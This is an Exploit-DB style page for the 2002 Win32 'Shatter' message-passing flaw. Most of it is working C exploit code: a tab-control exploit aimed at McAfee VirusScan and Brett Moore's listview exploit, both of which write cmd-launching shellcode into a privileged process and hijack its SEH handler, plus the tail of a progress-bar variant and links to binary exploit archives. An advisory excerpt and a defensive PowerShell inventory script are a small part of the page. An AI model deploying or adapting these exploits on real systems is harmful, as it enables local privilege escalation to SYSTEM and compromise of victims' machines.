        printf("+ Forcing Unhandled Exception\n");
        SendMessage((HWND)hWnd, (UINT)PBM_GETRANGE, 0, 1);
        printf("+ Done...\n");
        exit(0);
    }
}
Publication date: 2002-08-05 22:00 +00:00 Author: Oliver Lavery EDB Verified: Yes
/**********************************************************
 * Tab Control Shatter exploit for McAfee A/V products
 * (or any other program that includes a tab control)
 *
 * Demonstrates the use of tab control messages to:
 * - inject shellcode to known location
 * - overwrite 4 bytes of a critical memory address
 *
 * 3 Variables need to be set for proper execution.
 * - tWindow is the title of the program's main window
 * - sehHandler is the critical address to overwrite
 * - shellcodeaddr is the data space to inject the code
 *
 * Hardcoded addresses are for XP SP 1
 * Try it out against any program with a tab control.
 * Oliver Lavery <oliver.lavery at sympatico.ca>
 *
 * Based on (and pretty much identical to) shatterseh2.c by
 * Brett Moore [ brett moore security-assessment com ]
 **********************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strcmp() */

// Local Cmd Shellcode.
// Added a loadLibrary call to make sure msvcrt.dll is present -- ol
//   nop
//   push "rt\0\0" ; push "msvc"                 -> ESP now points at "msvcrt\0"
//   push esp ; mov ecx, <LoadLibraryA> ; call ecx  (address patched in at offset 13)
//   push "cmd\0" ; push esp ; mov ecx, <system> ; call ecx  (address patched in at offset 26)
//   int 3
BYTE exploit[] =
"\x90\x68\x72\x74\x00\x00\x68\x6D\x73\x76\x63\x54\xB9\x61\xD9\xE7\x77\xFF\xD1"
"\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";

char g_classNameBuf[256];
char tWindow[] = "VirusScan Status";  // The name of the main window
long sehHandler = 0x77edXXXX;         // Critical Address To Overwrite (placeholder: set it for the target)
long shellcodeaddr = 0x77ed7484;      // Known Writeable Space Or Global Space
// you might want to find a less destructive spot to stick the code, but this works for me --ol

void doWrite(HWND hWnd, long tByte, long address);
void IterateWindows(HWND hWnd);

int main(int argc, char *argv[])
{
    HWND hWnd;
    HMODULE hMod;
    DWORD ProcAddr;
    printf("%% Playing with tabcontrol messages\n");
    printf("%% Oliver Lavery.\n\n");
    printf("%% based on Shatter SEH code by\n");
    printf("%% brett moore security-assessment com\n\n");
    // Find local procedure address. System DLLs load at the same base in every
    // process on these Windows versions, so the local address is valid in the target.
    hMod = LoadLibrary("kernel32.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[13] = ProcAddr;
    hMod = LoadLibrary("msvcrt.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "system");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[26] = ProcAddr;
    printf("+ Finding %s Window...\n", tWindow);
    hWnd = FindWindow(NULL, tWindow);
    if (hWnd == NULL)
    {
        printf("+ Couldn't Find %s Window\n", tWindow);
        return 0;
    }
    printf("+ Found Main Window At...%p\n", hWnd);
    IterateWindows(hWnd);
    printf("+ Not Done...\n");
    return 0;
}

// Write one byte to 'address' inside the target process.
// TCM_SETITEMSIZE sets the fixed tab width (the exploit relies on item 1's
// left edge then coming out as tByte, hence the -2); TCM_GETITEMRECT makes the
// control write item 1's RECT to lParam, which it trusts as a pointer, so
// RECT.left lands at 'address'. Only the low byte of that dword is controlled,
// so bytes are written in ascending order and each call overwrites the bytes
// the previous one clobbered.
void doWrite(HWND hWnd, long tByte, long address)
{
    SendMessage(hWnd, (UINT)TCM_SETITEMSIZE, 0, MAKELPARAM(tByte - 2, 20));
    SendMessage(hWnd, (UINT)TCM_GETITEMRECT, 1, (LPARAM)address);
}

void IterateWindows(HWND hWnd)
{
    HWND childhWnd;
    long looper;
    childhWnd = GetNextWindow(hWnd, GW_CHILD);
    g_classNameBuf[0] = '\0';
    GetClassName(childhWnd, g_classNameBuf, sizeof(g_classNameBuf));
    // Walk the siblings (recursing into each) until a tab control is found or
    // the list ends. The NULL check matters: GetClassName fails on a NULL
    // handle and leaves the buffer untouched, which would otherwise recurse forever.
    while (childhWnd != NULL && strcmp(g_classNameBuf, "SysTabControl32") != 0)
    {
        IterateWindows(childhWnd);
        childhWnd = GetNextWindow(childhWnd, GW_HWNDNEXT);
        g_classNameBuf[0] = '\0';
        GetClassName(childhWnd, g_classNameBuf, sizeof(g_classNameBuf));
    }
    if (childhWnd != NULL)
    {
        // Item sizes are only honoured as given with TCS_FIXEDWIDTH, and the
        // minimum tab width must be dropped so that widths below the default are accepted.
        LONG wndStyle = GetWindowLong(childhWnd, GWL_STYLE);
        wndStyle |= TCS_FIXEDWIDTH;
        SetWindowLong(childhWnd, GWL_STYLE, wndStyle);
        printf("min %d\n", (int)SendMessage(childhWnd, (UINT)TCM_SETMINTABWIDTH, 0, (LPARAM)0));
        printf("+ Found tab control..%p\n", childhWnd);
        // Inject shellcode to known address
        printf("+ Sending shellcode to...0x%lxh\n", shellcodeaddr);
        for (looper = 0; looper < (long)sizeof(exploit); looper++)
            doWrite(childhWnd, (long)exploit[looper], shellcodeaddr + looper);
        // Overwrite SEH: point the top exception registration record's handler
        // at the shellcode, one byte at a time
        printf("+ Overwriting Top SEH....0x%lxh\n", sehHandler);
        doWrite(childhWnd, (shellcodeaddr) & 0xff, sehHandler);
        doWrite(childhWnd, (shellcodeaddr >> 8) & 0xff, sehHandler + 1);
        doWrite(childhWnd, (shellcodeaddr >> 16) & 0xff, sehHandler + 2);
        doWrite(childhWnd, (shellcodeaddr >> 24) & 0xff, sehHandler + 3);
        // Cause exception: lParam 1 is not a valid RECT pointer, so the write
        // faults inside the target and the patched SEH handler runs the shellcode
        printf("+ Forcing Unhandled Exception\n");
        SendMessage(childhWnd, (UINT)TCM_GETITEMRECT, 0, 1);
        printf("+ Done...\n");
        exit(0);
    }
}
Publication date: 2002-08-05 22:00 +00:00 Author: Brett Moore EDB Verified: Yes
// source: https://www.securityfocus.com/bid/5408/info
A serious design error in the Win32 API has been reported. It lies in the inter-window message passing system: a window message is delivered with no check on the privileges of the sender relative to the receiver, and some messages carry pointers or callback addresses that the receiving window procedure trusts. The flaw is wide-ranging and likely affects almost every Win32 window-based application. An attacker with local access can exploit it to elevate privileges whenever a window belonging to a higher-privileged process exists on the same interactive desktop. One example of such a process is antivirus software, which often must run with LocalSystem privileges.
** Microsoft has released a statement regarding this issue. Please see the References section for details.
A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner.
Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls.
Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows status bars using the WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details.
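The precondition every exploit on this page shares is a window owned by a higher-privileged process on the user's own desktop, so the first check a practitioner wants is an inventory of exactly those windows. The PowerShell script below is an added example and is not part of the advisory or of the exploits on this page. It lists the processes in the caller's logon session that own a visible top-level window and run under a different account, and, because the exploits here target specific common controls, it also reports which of those control classes (SysTabControl32, SysListView32 and its SysHeader32 header, msctls_statusbar32, msctls_progress32) each window contains. The helper class ShatterNative and its ChildClasses method are names chosen here for the example; the Win32 calls they wrap (EnumChildWindows, GetClassName) and the Win32_Process.GetOwner WMI method are real.

```powershell
# Added example (not from the advisory or the exploits on this page).
# Lists processes in the caller's logon session that own a visible top-level
# window but run under a different account, i.e. windows an unprivileged user
# can reach with SendMessage on the affected Windows versions. A process whose
# owner cannot be read is reported as "<access denied>" and kept in the list,
# since that alone means the process is more privileged than the caller.
# Requires Windows PowerShell 3.0 or later (Get-CimInstance).

# Class names of the common controls abused by the exploits on this page
# (tab control, listview and its header, status bar, progress bar).
$knownShatterClasses = @('SysTabControl32', 'SysListView32', 'SysHeader32',
                         'msctls_statusbar32', 'msctls_progress32')

# P/Invoke helper (name chosen for this example) that walks a window's
# children with EnumChildWindows and returns their window class names.
Add-Type -TypeDefinition @'
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
public static class ShatterNative {
    delegate bool EnumChildProc(IntPtr hWnd, IntPtr lParam);
    [DllImport("user32.dll")]
    static extern bool EnumChildWindows(IntPtr parent, EnumChildProc cb, IntPtr lParam);
    [DllImport("user32.dll", CharSet = CharSet.Unicode)]
    static extern int GetClassName(IntPtr hWnd, StringBuilder name, int max);
    public static string[] ChildClasses(IntPtr parent) {
        var found = new List<string>();
        EnumChildWindows(parent, (h, l) => {
            var sb = new StringBuilder(256);
            if (GetClassName(h, sb, sb.Capacity) > 0) found.Add(sb.ToString());
            return true;   // keep enumerating
        }, IntPtr.Zero);
        return found.ToArray();
    }
}
'@

$me        = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$mySession = (Get-Process -Id $PID).SessionId

$report = foreach ($p in Get-Process | Where-Object {
              $_.SessionId -eq $mySession -and $_.MainWindowHandle -ne [IntPtr]::Zero }) {
    # Default assumes the worst: GetOwner fails (non-zero ReturnValue or an
    # error) when the caller may not open the process token.
    $owner = '<access denied>'
    $cim = Get-CimInstance Win32_Process -Filter "ProcessId = $($p.Id)" -ErrorAction SilentlyContinue
    if ($cim) {
        $r = Invoke-CimMethod -InputObject $cim -MethodName GetOwner -ErrorAction SilentlyContinue
        if ($r -and $r.ReturnValue -eq 0) { $owner = "$($r.Domain)\$($r.User)" }
    }
    $classes = [ShatterNative]::ChildClasses($p.MainWindowHandle) | Sort-Object -Unique
    [pscustomobject]@{
        Pid      = $p.Id
        Name     = $p.ProcessName
        Owner    = $owner
        Title    = $p.MainWindowTitle
        Controls = @($classes | Where-Object { $knownShatterClasses -contains $_ }) -join ', '
    }
}

# Only windows owned by someone other than the caller are a privilege boundary.
$report | Where-Object { $_.Owner -ne $me } | Format-Table -AutoSize
```

Run it as the unprivileged user whose exposure you want to measure. A hit means a higher-privileged process has a window on your desktop, which is the precondition the exploits here rely on; it does not by itself mean the window procedure is exploitable. Get-Process only reports one visible main window per process, so hidden windows and secondary top-level windows are not covered. On Windows Vista and later, session 0 isolation keeps service windows out of user sessions and User Interface Privilege Isolation blocks most messages sent from a lower-integrity process to a higher-integrity window, so a hit on those systems still needs an integrity-level comparison that this script does not make.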
/**********************************************************
 * shatterseh2.c
 *
 * Demonstrates the use of listview messages to:
 * - inject shellcode to known location
 * - overwrite 4 bytes of a critical memory address
 *
 * 3 Variables need to be set for proper execution.
 * - tWindow is the title of the program's main window
 * - sehHandler is the critical address to overwrite
 * - shellcodeaddr is the data space to inject the code
 * The 'autofind' feature may not work against all programs.
 * Insert your own blank lines for readability
 * Try it out against any program with a listview.
 * eg: explorer, IE, any file open dialog
 * Brett Moore [ brett.moore@security-assessment.com ]
 * www.security-assessment.com
 **********************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */

// Local Cmd Shellcode:
//   nop ; push "cmd\0" ; push esp ; mov ecx, <system> ; call ecx ; int 3
//   (the address of system() is patched in at offset 8)
BYTE exploit[] =
"\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
HWND hLVControl, hHdrControl;
char tWindow[] = "Main Window Title";  // The name of the main window
long sehHandler = 0x77edXXXX;          // Critical Address To Overwrite (placeholder: set it for the target)
long shellcodeaddr = 0x0045e000;       // Known Writeable Space Or Global Space
void doWrite(long tByte, long address);
void IterateWindows(HWND hWnd);

int main(int argc, char *argv[])
{
    HWND hWnd;
    HMODULE hMod;
    DWORD ProcAddr;
    printf("%% Playing with listview messages\n");
    printf("%% brett.moore@security-assessment.com\n\n");
    // Find local procedure address (msvcrt.dll loads at the same base in the
    // target on these Windows versions, so the local address is valid there)
    hMod = LoadLibrary("msvcrt.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "system");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[8] = ProcAddr;
    printf("+ Finding %s Window...\n", tWindow);
    hWnd = FindWindow(NULL, tWindow);
    if (hWnd == NULL)
    {
        printf("+ Couldn't Find %s Window\n", tWindow);
        return 0;
    }
    printf("+ Found Main Window At...%p\n", hWnd);
    IterateWindows(hWnd);
    printf("+ Not Done...\n");
    return 0;
}

// Write one byte to 'address' inside the target process.
// LVM_SETCOLUMNWIDTH makes column 0 tByte pixels wide, so header item 1 starts
// at x = tByte; HDM_GETITEMRECT then makes the header control write item 1's
// RECT to lParam, which it trusts as a pointer, so RECT.left (== tByte) lands
// at 'address'. Only the low byte of that dword is controlled, so bytes are
// written in ascending order and each call repairs what the previous one clobbered.
void doWrite(long tByte, long address)
{
    SendMessage(hLVControl, (UINT)LVM_SETCOLUMNWIDTH, 0, MAKELPARAM(tByte, 0));
    SendMessage(hHdrControl, (UINT)HDM_GETITEMRECT, 1, (LPARAM)address);
}

void IterateWindows(HWND hWnd)
{
    HWND childhWnd;
    long looper;
    // Depth-first walk of the whole child tree; exit() fires on the first hit
    childhWnd = GetNextWindow(hWnd, GW_CHILD);
    while (childhWnd != NULL)
    {
        IterateWindows(childhWnd);
        childhWnd = GetNextWindow(childhWnd, GW_HWNDNEXT);
    }
    // 'autofind': any window that answers LVM_GETHEADER with a handle is taken
    // to be a listview with a header control
    hLVControl = hWnd;
    hHdrControl = (HWND)SendMessage(hLVControl, (UINT)LVM_GETHEADER, 0, 0);
    if (hHdrControl != NULL)
    {
        // Found a Listview Window with a Header
        printf("+ Found listview window..%p\n", hLVControl);
        printf("+ Found lvheader window..%p\n", hHdrControl);
        // Inject shellcode to known address
        printf("+ Sending shellcode to...0x%lxh\n", shellcodeaddr);
        for (looper = 0; looper < (long)sizeof(exploit); looper++)
            doWrite((long)exploit[looper], shellcodeaddr + looper);
        // Overwrite SEH: point the top exception registration record's handler
        // at the shellcode, one byte at a time
        printf("+ Overwriting Top SEH....0x%lxh\n", sehHandler);
        doWrite((shellcodeaddr) & 0xff, sehHandler);
        doWrite((shellcodeaddr >> 8) & 0xff, sehHandler + 1);
        doWrite((shellcodeaddr >> 16) & 0xff, sehHandler + 2);
        doWrite((shellcodeaddr >> 24) & 0xff, sehHandler + 3);
        // Cause exception: lParam 1 is not a valid RECT pointer, so the write
        // faults inside the target and the patched SEH handler runs the shellcode
        printf("+ Forcing Unhandled Exception\n");
        SendMessage(hHdrControl, (UINT)HDM_GETITEMRECT, 0, 1);
        printf("+ Done...\n");
        exit(0);
    }
}
Publication date: 2002-08-05 22:00 +00:00 Author: Ovidio Mallo EDB Verified: Yes
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21690.rar
Publication date: 2002-08-05 22:00 +00:00 Author: anonymous EDB Verified: Yes
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21691.zip